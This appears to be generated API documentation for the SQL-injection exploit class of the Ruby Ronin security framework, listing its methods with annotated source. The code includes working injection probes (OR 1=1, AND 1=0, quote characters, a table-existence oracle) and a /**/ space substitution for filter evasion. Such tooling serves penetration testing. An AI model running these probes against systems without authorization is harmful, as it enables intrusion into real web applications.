Class: Ronin::Exploits::SQLi

Inherits:
Web show all
Defined in:
lib/ronin/exploits/sqli.rb

Constant Summary collapse

SPACES =

Alternative white-space separators for the rendered SQL, keyed by the exploit's `space` option (`nil` selects a plain space; `comment` uses an inline `/**/` in place of a space).

{
  nil      => ' ',     # default: a literal space
  tab:     "\t",       # horizontal tab
  newline: "\n",       # line feed
  comment: '/**/'      # empty inline comment standing in for a space
}

Constants inherited from HTTP

HTTP::DEFAULT_PORT

Instance Attribute Summary

Attributes inherited from Exploit

#encoders, #helpers, #raw_payload, #restricted_chars, #target

Attributes included from Payloads::HasPayload

#payload

Instance Method Summary collapse

Methods inherited from Web

#exploit, #http_request, #normal_body, #normal_response, test, #url, #url_query_param_value

Methods inherited from HTTP

#url_for

Methods inherited from RemoteTCP

#deploy!, #test!

Methods included from Model::HasDefaultPort

included

Methods inherited from Exploit

#advisory, advisory, #arch, #build!, #build_payload!, #deploy!, #encode_payload, #encode_payload!, #evacuate!, #exploit!, #helper, #initialize, #os, #payload=, #restrict, #software, #targeting, #targeting_arch, targeting_arch, #targeting_os, targeting_os, #targeting_software, targeting_software, #use_target!

Methods included from Tests

#is_restricted?, #test_arch!, #test_os!, #test_restricted!, #test_software!, #test_target!

Methods included from PostExploitation::Mixin

#fs, #post_exploitation, #process, #resources, #shell

Methods included from Payloads::HasPayload

#default_payload, #initialize, #method_missing, #payload_class, #respond_to?, #use_payload!, #use_payload_from!

Constructor Details

This class inherits a constructor from Ronin::Exploits::Exploit

Dynamic Method Handling

This class handles dynamic methods through the method_missing method in the class Ronin::Payloads::HasPayload

Instance Method Details

#db_has_table?(name) ⇒ Boolean

Determines if a table exists in the Database.


# File 'lib/ronin/exploits/sqli.rb', line 179

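# Determines whether a table named +name+ exists in the backend database.
#
# Injects +AND (SELECT COUNT(*) FROM name) = 1+ and compares the size of
# the resulting page with the unmodified (normal) response.
#
# @param [String, Symbol] name
#   The table name to probe. It is spliced verbatim into the injected SQL,
#   so it must come from the operator, never from a third party.
#
# @return [Boolean]
#   +true+ if the injected page is no larger than the normal page;
#   +false+ otherwise, or when either response carries no Content-Length
#   (chunked/streamed responses), in which case the oracle is inconclusive.
#
# NOTE(review): this is a blind, size-based oracle. A database error page
# for a non-existent table can also shrink the response, so calibrate
# against a table known to be missing before trusting a +true+ result.
def db_has_table?(name)
  sql = sqli.and { |q| q.select(q.count).from(name) == 1 }

  baseline = normal_response.content_length
  injected = exploit(sql).content_length

  # Without a Content-Length on both sides there is nothing to compare;
  # +nil < Integer+ would raise NoMethodError here.
  return false if baseline.nil? || injected.nil?

  baseline >= injected
end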

#exploit_url(sql, query_params = {}) ⇒ URI::HTTP

Creates an exploit URL that injects the given SQL into the query string.


# File 'lib/ronin/exploits/sqli.rb', line 107

# Builds the exploit URL with the SQL embedded in the query string.
#
# Objects that respond to +to_sql+ (e.g. an +SQL::Injection+) are rendered
# using this exploit's white-space and statement-termination settings;
# anything else is converted with +to_s+ and used as-is.
#
# @param [#to_sql, #to_s] sql
#   The SQL, or injection object, to embed.
# @param [Hash] query_params
#   Extra query parameters forwarded to the parent implementation.
# @return [URI::HTTP]
def exploit_url(sql,query_params={})
  rendered = if sql.respond_to?(:to_sql)
               sql.to_sql(space: SPACES[self.space], terminate: self.terminate?)
             else
               sql.to_s
             end

  super(rendered,query_params)
end

#place_holderInteger, ...

The place-holder value to insert just before the injected SQL.


# File 'lib/ronin/exploits/sqli.rb', line 64

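# The place-holder value inserted just before the injected SQL, derived
# from the original query-parameter value and coerced to match the
# +escape+ mode so the injected expression keeps the type of the value it
# replaces.
#
# The result is memoized in +@place_holder+.
#
# @return [Integer, Float, String, Array, Symbol, nil]
#   The coerced value; +nil+ when +escape+ is not one of the known modes.
#
# @raise [NoMethodError] if +escape+ is +nil+ (it must respond to +to_sym+).
def place_holder
  @place_holder ||= case self.escape.to_sym
                    when :integer then url_query_param_value.to_i
                    when :decimal then url_query_param_value.to_f
                    when :string  then url_query_param_value.to_s
                    when :list
                      value = url_query_param_value

                      # \A and \z anchor the whole value; ^ and $ are
                      # per-line anchors, so a value such as "1\nfoo" would
                      # otherwise be classified as an integer and silently
                      # truncated by #to_i.
                      case value
                      when /\A\d+\z/      then [value.to_i]
                      when /\A\d*\.\d+\z/ then [value.to_f]
                      else                     [value.to_s]
                      end
                    when :column  then url_query_param_value.to_sym
                    end
end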

#sqli(&block) ⇒ SQL::Injection

Creates a new SQL injection.


# File 'lib/ronin/exploits/sqli.rb', line 87

# Builds a new SQL injection bound to this exploit's escape mode and
# place-holder value.
#
# @yield [injection]
#   Optional block handed straight to +SQL::Injection.new+.
# @return [SQL::Injection]
def sqli(&block)
  mode   = self.escape.to_sym
  prefix = place_holder

  SQL::Injection.new(escape: mode, place_holder: prefix, &block)
end

#test_and_falseBoolean

Tests for SQL injection by appending AND 1=0.


# File 'lib/ronin/exploits/sqli.rb', line 136

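# Boolean-blind probe: injects +AND 1=0+ and checks whether the page shrinks.
#
# A vulnerable page evaluates the always-false condition and returns fewer
# rows (a smaller body) than the unmodified request.
#
# @return [Boolean]
#   +true+ if the injected response is smaller than the normal one;
#   +false+ otherwise, including when either side lacks a Content-Length
#   (chunked/streamed responses), which makes the comparison inconclusive.
def test_and_false
  sql = sqli.and { 1 == 0 }

  baseline = normal_response.content_length
  injected = exploit(sql).content_length

  # +nil > Integer+ raises NoMethodError; treat a missing header as "no signal".
  return false if baseline.nil? || injected.nil?

  baseline > injected
end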

#test_or_trueBoolean

Tests for SQL injection by appending OR 1=1.


# File 'lib/ronin/exploits/sqli.rb', line 148

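# Boolean-blind probe: injects +OR 1=1+ and checks whether the page grows.
#
# A vulnerable page evaluates the always-true condition and returns more
# rows (a larger body) than the unmodified request.
#
# @return [Boolean]
#   +true+ if the injected response is larger than the normal one;
#   +false+ otherwise, including when either side lacks a Content-Length
#   (chunked/streamed responses), which makes the comparison inconclusive.
def test_or_true
  sql = sqli.or { 1 == 1 }

  baseline = normal_response.content_length
  injected = exploit(sql).content_length

  # +nil < Integer+ raises NoMethodError; treat a missing header as "no signal".
  return false if baseline.nil? || injected.nil?

  baseline < injected
end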

#test_quotesBoolean

Tests for SQL injection by appending each quote character (', ", `) on its own and checking for an HTTP 500 response.


# File 'lib/ronin/exploits/sqli.rb', line 126

# Error-based probe: sends each quote character (+'+, +"+, +`+) on its own
# and reports whether any of them makes the server answer with HTTP 500.
#
# NOTE(review): only a literal status of +'500'+ counts. Applications that
# render the database error inside a 200 page, or answer with another 5xx,
# are not detected by this probe.
#
# @return [Boolean]
def test_quotes
  quotes = ["'", '"', '`']

  quotes.any? do |quote|
    response = exploit(quote)
    response.code == '500'
  end
end

#vulnerable?Boolean

Tests whether the URL is vulnerable to SQL injection.


# File 'lib/ronin/exploits/sqli.rb', line 164

# Tests whether the URL looks vulnerable to SQL injection.
#
# Runs the boolean-blind probes first and the error-based quote probe
# last, stopping at the first one that fires. The probes are heuristic
# (response-size and status-code oracles), so a +true+ result should be
# confirmed manually.
#
# @return [Boolean]
def vulnerable?
  return true if test_or_true
  return true if test_and_false

  test_quotes
end